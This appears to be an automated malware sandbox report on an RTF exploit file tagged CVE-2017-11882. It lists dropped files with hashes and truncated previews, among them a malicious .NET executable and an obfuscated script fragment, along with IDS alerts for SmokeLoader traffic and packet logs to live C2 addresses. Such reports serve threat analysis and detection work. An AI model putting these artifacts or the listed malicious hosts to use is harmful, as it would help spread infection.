                                                    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                    Malicious:false
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11264
                                                    Entropy (8bit):3.5492038516464706
                                                    Encrypted:false
                                                    SSDEEP:192:W0hkLlVEaY2KaQP1fQERQprctBmUgXBRJZA/D2MuwsL0nxjywfUemlEDolBMBIQB:/kZylraQP1oIQprctBmRBPe97xjywfOS
                                                    MD5:3764E4CA96AE27DAB8B915F3221C6858
                                                    SHA1:739A5F9B07458720C95473CC5E67F7842DCDBF93
                                                    SHA-256:82872288B166F2CE648028B559530201692E024EDAA1C40BD696364691DE86E3
                                                    SHA-512:3886E03C7B29ECAA928763CA4311F84B1C483875F608E75DB0992AD9489242AECD203A09FA8DCA3F2C970D067D5DCC9726917A3A93DC1D22A7948B00B3C69D6C
                                                    Malicious:false
                                                    Preview:..............8.5.5.4.8.5.2.%.;.*.6.,.[.<.?.|.*.;.@.9.?.(.?.(.8.0.?...!.$.'.@...@.|.*.?.?.=.~.-.1.?.3.3.7.1.*.7.!.<._...4.#.-.,.9.(.?...).....~._.#.#.;.3.?.+...7.,.(.~.+.<.<.?.).).!.)...1.>.#._._.5.....<.:...9.'.^.~.2.=.0.5.8.%.].:.@.4.|.+.3.1.)...^.;.?.?...8.%.=.=.9.[.+._.8.*.1.$.^.%.-.%.7.].@.?.-.*.*.5.;.+.&.(.$.~.?.=.%.,.<.5.7.9.;.?.`.].@.1.3.>.3.;.(.6.:.$.1.).`.2.*.?.6.@.|.<.!.[.9.7.2.+.!.:.1.`.?.2.<.+.4./.~.4.;.4...(...9.&.>.^.].&.?.5.2.0.^.?./.(.4...`...%...'.%.;.3...?.0.<.6.@.^.5.>.%.5.|.;.,...8.?.*.5.2.*.&.>.$.?._.8.$..._.1.>.,.^.|.).)...6.`.<.~.?.@.'.>.?.%.~.?.?.>.8.<.?.2.4.3.>.9.-.|.`...?.$.*.9.6.6.^.'.3.+.;.-.'.5.*...+.=.+.<...4.&.8.0.8.?.7.:.|.1...0...9.1.!.6.2.^.8.*.2.[.].?.<.#.:...&.:.2...>.%.%.5.-.8.?.?.%.!.%.5...).+.?.3.(.9.?...5.[.~.2.'.`.?.].8.8.?.>.?.&.8.+.[.2.'.*.|.?.4.^./.>.?.=.>.3.[.&.%.!.|._.../.9.[.;.'...#.?.|.`.+.?.@.%.6.0.6.=.#.).4.^.?./.`.~.9.~.,.#.1.@.=.$.$.<.&.?...@...$.?.5.%.'.1.*.[.7.,.4.7.2.?.2.!.9...+.^.@.0.!.?.,.>.7.3.2.4.+.<.^.3.$...$.^.8.9.%...,.?.#.
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.7798653713156546
                                                    Encrypted:false
                                                    SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                    MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                    SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                    SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                    SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.3870145383915669
                                                    Encrypted:false
                                                    SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                    MD5:1623709C6B2FB813984B1265C26A85F1
                                                    SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                    SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                    SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                    Category:dropped
                                                    Size (bytes):77824
                                                    Entropy (8bit):1.133993246026424
                                                    Encrypted:false
                                                    SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                    MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                    SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                    SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                    SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Jul 31 16:24:56 2024, length=102469, window=hide
                                                    Category:dropped
                                                    Size (bytes):1234
                                                    Entropy (8bit):4.552674071316221
                                                    Encrypted:false
                                                    SSDEEP:24:8G/XTotxOKIJ5HCdOlfem38PRHCdOlkDv3q057u:8G/XTsK5HCcfNCHCcL09u
                                                    MD5:5506960FB71F4F863AB7A86C68F000AC
                                                    SHA1:5BC5D11542BF7BA4B72103F80105CB7C4144C009
                                                    SHA-256:9E0DFE04F9775AE5DB503ABB05474ED1A0D2F11ED27898B70462E17A121E9C80
                                                    SHA-512:415B26088B7DDAC791D91A668AFA89A38123AC074B861C892588F22C50B57CE90436BFA71AE5D5A54B4CFB83A3648ACF84B783B9D9E4D6B582598A7D210806CF
                                                    Malicious:false
                                                    Preview:L..................F.... ....&(.r....&(.r...@.1.....E.......................'....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Y....user.8......QK.X.Y..*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.E....Y.. .SECURI~1.RTF..........WC..WC.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.8.6.9...5.4.0.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\045012\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf.Q.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.8.6.9...5.4.0.5...r.t.f.........:..,.LB.)...Ag...............1SP
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Generic INItialization configuration [folders]
                                                    Category:dropped
                                                    Size (bytes):143
                                                    Entropy (8bit):5.0406982196266314
                                                    Encrypted:false
                                                    SSDEEP:3:H9rbcK+JiMUX2Alm4P8bcK+JiMUX2Alv:H9rwKNVX2AKwKNVX2A1
                                                    MD5:9CD4B2670BA206D46D78C25542C1E6A2
                                                    SHA1:A04B53F292AD58867B54CCCDC65ED4891B0553D1
                                                    SHA-256:0E02614289B47A8B940D5E5B9E6EE37A9C047DE9670D9AE6EF83B5BE72F030A5
                                                    SHA-512:5EBDCE4CC50345E0EFC5425549312444048E2092EFFEA162CA6D86F18D6B77A11746A7B2A737A85D81FA524807494440271C33070758D88971440F92224D7EFA
                                                    Malicious:false
                                                    Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK=0..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                    MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                    SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                    SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                    SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    Process:C:\Windows\explorer.exe
                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):64704
                                                    Entropy (8bit):6.02370063609959
                                                    Encrypted:false
                                                    SSDEEP:768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
                                                    MD5:8FE9545E9F72E460723F484C304314AD
                                                    SHA1:3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
                                                    SHA-256:D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
                                                    SHA-512:0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: 40830001.xls, Detection: malicious
                                                    • Filename: capcut Setup-x64.msi, Detection: malicious
                                                    • Filename: 7YZlAbfKMg.rtf, Detection: malicious
                                                    • Filename: Product Inquiry466789.xls, Detection: malicious
                                                    • Filename: A24-00342B139336 #TW_Inquiry.xls, Detection: malicious
                                                    • Filename: LgTFM1JlJu.rtf, Detection: malicious
                                                    • Filename: #20240627_Edlen_B.xls, Detection: malicious
                                                    • Filename: #20240627_Edlen_A.xls, Detection: malicious
                                                    • Filename: Requirements.xla.xlsx, Detection: malicious
                                                    • Filename: vns.exe, Detection: malicious
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):183084
                                                    Entropy (8bit):3.886576284833851
                                                    Encrypted:false
                                                    SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                    MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                    SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                    SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                    SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                    Malicious:true
                                                    Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.
                                                    Process:C:\Windows\explorer.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):339146
                                                    Entropy (8bit):7.999485892516095
                                                    Encrypted:true
                                                    SSDEEP:6144:vTRiNxMS/8R+glFU+3aJonkHLGpwQLaWUZGUX985IFUDH9cxdy+:v1iANyokHLGiQLaDQSUL9x+
                                                    MD5:9DEF0A335F47C66868E4F0164B04679E
                                                    SHA1:4D312D7C6C9E54E3BE7A50B84B0CBB25F38EF008
                                                    SHA-256:6AA186F54BDABAFFE99FD6503E45B1E7DDD74BA238C20BA94E81B913F54F6FE7
                                                    SHA-512:BAE2E5A628CD14D6B5BE595CAC5006FC6605B0199065EB5578C9DD2AF2FCD03FF51BBC4A54EFEB33B240AAD214FD0172C9A6FE6959DF7654C1EF3DDC466F84ED
                                                    Malicious:false
                                                    Preview:.p....f..l..k..;..>u%....(O*.H.m...........U....(..oZ.."V.+..W..=.,H.{...We......L.b.5.....<......]...c.ab.%:..zp .W..gX=i..B....5...:..s.(...x.A+m.K:.K...}...Z...'.\...*...y....&.O..@.B...v..R6.5^....t.n...d..Ul..V.....].0....2K.;.p(..@.d.. 43T.r..+.W../.S.4.e].'l.O.9I..8M.HO?.x}..".oG...E.o>ht.n..3.........e...6....a....$"....].rh}C...l..=E..'.!z%8..N.....Bc.. T.........{P~?....X..a.j"L......6.(.f`)A.c.(.....*[e.c...W....`...#....Z.@..y...7...Ox.......2.{hc.:7..#+(....GoZ.x..K..8...d.....GEK.q.2...S..~.*.E..7..8n.Mi.~=.pa.&.9v.......m..7e......{.j.Y.p....h.....3.mA..X....E.k8.Qf.H..S.#:A._...RI..M3.\...q.r2+.^.0%.dOo.v.?..r-1...*t............*..r....E..........2.a..#..m.O.G...,..KA.n.".68..d.......... E(.............{.x....D.>..q......0.j~.....<c...r}...U...O...;.....r..E..z..A.....I<......n..HB........$..eA..d(}.Q..J...K......~.XnT8..Ix.(..C...>....n.w.G|.p.t..oUZou.Q...\./.c.......f.[..\...-`...g...H.y..zTi.s.A..&.n..-L..."+6.
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                    MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                    SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                    SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                    SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    File type:Rich Text Format data, version 1
                                                    Entropy (8bit):2.582252060648168
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
                                                    File size:102'469 bytes
                                                    MD5:1131d758c8208af277e943f04339e646
                                                    SHA1:030adac1abc31aa8bc3a22dda63c4a005aee6e88
                                                    SHA256:eb8381b156aad734ef3a0328b4985ed1edeca1c8d79d66e094598f8c6992ac71
                                                    SHA512:31952ff007778891c6fe0e34931233e396ee3649c8e502fe35808f2322afafeeb89d102c3eb364e0c3c3be1b84240a0375c58b4045a80ab2d838f0778dbbc5f0
                                                    SSDEEP:768:RnuaXplG+yhAWeLYLguPxUyxYxqY0WqhmRMw:RuTvhAWeLbuP6yiwY0WQmRMw
                                                    TLSH:96A3DF9DD74F00A5CF94A237421B4A8A49FCB73EF24110A578AC837437EDC2E49A59BC
                                                    File Content Preview:{\rtf1.............{\*\levelnumbers180579240 \%}.{\28554852%;*6,[<?|*;@9?(?(80?.!$'@.@|*??=~-1?3371*7!<_.4#-,9(?.)..~_##;3?+.7,(~+<<?))!).1>#__5..<:.9'^~2=058%]:@4|+31).^;??.8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;
                                                    Icon Hash:2764a3aaaeb7bdbf
                                                    Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                    0 | 00001483h |  |  |  |  |  |  |  | no
                                                    Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                                                    2024-08-31T19:25:33.084582+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49166 | 80 | 192.168.2.22 | 185.251.91.119
                                                    2024-08-31T19:26:53.834308+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49168 | 80 | 192.168.2.22 | 185.251.91.119
                                                    2024-08-31T19:25:41.127631+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49167 | 80 | 192.168.2.22 | 185.251.91.119
                                                    2024-08-31T19:25:33.477519+0200 | TCP | 2829848 | ETPRO MALWARE SmokeLoader encrypted module (3) | 2 | 80 | 49166 | 185.251.91.119 | 192.168.2.22
                                                    2024-08-31T19:25:08.839977+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49164 | 207.241.232.154 | 192.168.2.22
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Aug 31, 2024 19:25:01.480722904 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:01.742561102 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:01.742644072 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:01.742921114 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:01.750555038 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423346996 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423366070 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423372984 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423506975 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.423536062 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423567057 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423577070 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423588991 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423602104 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423602104 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.423624039 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.423636913 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.423787117 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423799038 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423847914 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.423871040 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.423913956 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.427826881 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.428734064 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.428792953 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.428796053 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.428806067 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.428833961 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.428915977 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.428961039 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.433593988 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.433625937 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.433660984 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.433672905 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.433698893 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.433706045 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.433743954 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.438349962 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.438360929 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.438395023 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.438395023 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
                                                    Aug 31, 2024 19:25:02.438575029 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.438585043 CEST | 80 | 49163 | 23.94.148.16 | 192.168.2.22
                                                    Aug 31, 2024 19:25:02.438607931 CEST | 49163 | 80 | 192.168.2.22 | 23.94.148.16
